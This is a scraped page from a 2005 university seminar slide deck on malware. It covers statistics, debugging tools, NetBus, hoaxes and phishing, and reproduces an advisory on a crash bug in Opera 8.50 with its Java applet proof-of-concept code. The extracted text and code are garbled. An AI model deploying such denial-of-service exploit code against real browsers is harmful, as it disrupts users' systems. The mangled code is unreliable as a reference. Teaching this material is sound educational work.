Malware Cont Maxim Vainstein Emanuel Hahamov HUJI CS

Malware – Example(2) Opera Java Applet Do. S ¨ Summary Opera is "a computer

System Debug Tools ¨ Sys. Internals www. sysinternals. com ¨ ¨ ¨ Process Explorer

Net. Bus - Demo l l l Advanced Remote Control Backdoor Key logger Screen

Scams and Hoaxes l Malware-related l False Information (to force user for unwanted action)

Jokes (JOKE_BURST. A, JOKE_TRAIN. B) l No malicious code, but can be noisy

Phishing – Local/Web Network Redirection l False known website Banks l e. Commerce l

Slides: 14

Download presentation

Malware – Cont. Maxim Vainstein & Emanuel Hahamov HUJI, CS, Seminar in Software Design 08. 12. 2005

Malware Statistic

Malware Statistic Cont.

Take it “easy”…

Take it “easy”… (Cont. )

Malware – Example

Malware – Example(2) Opera Java Applet Do. S ¨ Summary Opera is "a computer application for handling most common internet-related tasks, including: web browsing, sending and receiving messages, managing contacts and online chat". A vulnerability in a Opera allows remote attackers to cause the program to crash by utilizing a malicious Java applet. ¨ Details Vulnerable Systems: * Opera version 8. 50 Immune Systems: * Opera version 8. 51 It is possible to crash the opera 8. 50 browser with a simple java Applet (see below). This was observed on Win 32, Linux versions maybe affected, too. This can be tested at: http: //www. illegalaccess. org/exploit/opera 85/Opera. Applet. html As you can see the applet crashes at 0 x 67 c 0 a 54 c. This is caused by a bug in a JNI routine implementing the com. opera. JSObject class. It cannot beruled out, that this bug is exploitable. The opera guys were informed on the 21 st of September, and then again on 8 th of October. ¨ Code ¨ Additional Information The information has been provided by <mailto: marc. schoenefeld@gmx. org> Marc Schoenefeld. import java. applet. Applet; import java. awt. Graphics; import netscape. javascript. JSObject; public class Opera. Test extends Applet} static { System. out. println("Loaded 1. 2; (" { public void paint(Graphics g( { System. out. println("start; (" try} netscape. javascript. JSObject jso = JSObject. get. Window(this; ( System. out. println(jso. get. Class; (() com. opera. JSObject j = (com. opera. JSObject ) jso; char[] x = new char[1000000; [ for (int y = 0 ; y < x. length; y} (++ x [y] = 'A; ' { String z = new String(x; ( System. out. println("after evalb; (" j. remove. Member(z; ( System. out. println("after remove; (" } catch (Exception e} ( e. print. Stack. Trace; () } } {

System Debug Tools ¨ Sys. Internals www. sysinternals. com ¨ ¨ ¨ Process Explorer File. Mon Reg. Mon Tcp. View TDIMon Win. Obj More… Emsi A 2 -Hijack. Free LSPfix Task. Manager 16 Ethreal Network Sniffer

Net. Bus - Demo l l l Advanced Remote Control Backdoor Key logger Screen capture Multimedia Capture l l Video Sound Microphone False Remote Administration/Helpdesk ? !

More Malware

Scams and Hoaxes l Malware-related l False Information (to force user for unwanted action) l Scams l l And Shams Luck-based hoaxes Money-based hoaxes l Urban Legends

Jokes (JOKE_BURST. A, JOKE_TRAIN. B) l No malicious code, but can be noisy

Phishing – Local/Web Network Redirection l False known website Banks l e. Commerce l e. Mails l

Questions ?